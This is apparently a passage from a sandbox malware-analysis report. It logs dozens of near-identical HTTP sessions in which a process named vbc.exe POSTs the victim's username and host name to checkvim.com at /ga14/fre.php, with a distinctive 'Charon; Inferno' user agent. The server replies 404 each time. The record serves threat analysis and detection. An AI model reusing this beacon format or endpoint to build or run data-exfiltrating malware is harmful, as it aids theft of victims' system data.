                    Sep 28, 2021 06:51:47.438097954 CEST380OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:47.719933033 CEST380INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    117192.168.2.22492825.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:47.981725931 CEST381OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:48.045474052 CEST381OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:48.346430063 CEST381INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    118192.168.2.22492835.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:48.617826939 CEST382OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:48.687303066 CEST382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:48.974654913 CEST383INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    119192.168.2.22492845.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:49.261615038 CEST383OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:49.333508968 CEST384OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:49.615706921 CEST384INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:00 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.22491775.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:40.313215971 CEST235OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:40.376852036 CEST235OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:40.677572966 CEST236INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    120192.168.2.22492855.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:49.892301083 CEST385OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:49.963511944 CEST385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:50.238603115 CEST385INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:01 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    121192.168.2.22492865.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:50.514178991 CEST386OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:50.592200994 CEST386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:50.888613939 CEST387INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:02 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    122192.168.2.22492875.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:51.179560900 CEST388OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:51.259447098 CEST388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:51.573348045 CEST388INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:02 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    123192.168.2.22492885.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:51.856518984 CEST389OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:51.920088053 CEST389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:52.219077110 CEST390INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:03 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    124192.168.2.22492895.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:52.480074883 CEST390OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:52.550542116 CEST391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:52.847075939 CEST391INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:04 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    125192.168.2.22492905.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:53.107024908 CEST392OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:53.175128937 CEST392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:53.463998079 CEST392INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:04 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    126192.168.2.22492915.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:53.732530117 CEST393OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:53.805408955 CEST393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:54.083511114 CEST394INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    127192.168.2.22492925.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:54.342200994 CEST395OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:54.412080050 CEST395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:54.702146053 CEST395INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:06 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    128192.168.2.22492935.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:54.979604959 CEST396OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:55.052917957 CEST396OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:55.321449995 CEST396INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:06 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    129192.168.2.22492945.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:55.578587055 CEST397OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:55.649363041 CEST398OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:55.942091942 CEST398INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.22491785.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:40.962631941 CEST237OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:41.029413939 CEST237OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:41.324284077 CEST237INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    130192.168.2.22492955.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:56.360419035 CEST399OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:56.429302931 CEST399OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:56.719525099 CEST399INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    131192.168.2.22492965.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:57.142891884 CEST400OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:57.235702991 CEST400OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:57.491220951 CEST401INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    132192.168.2.22492975.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:57.735769987 CEST401OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:57.804269075 CEST402OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:58.091068983 CEST402INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:09 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    133192.168.2.22492985.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:58.357271910 CEST403OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:58.430711031 CEST403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:58.714416027 CEST403INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    134192.168.2.22492995.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:58.978533030 CEST404OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
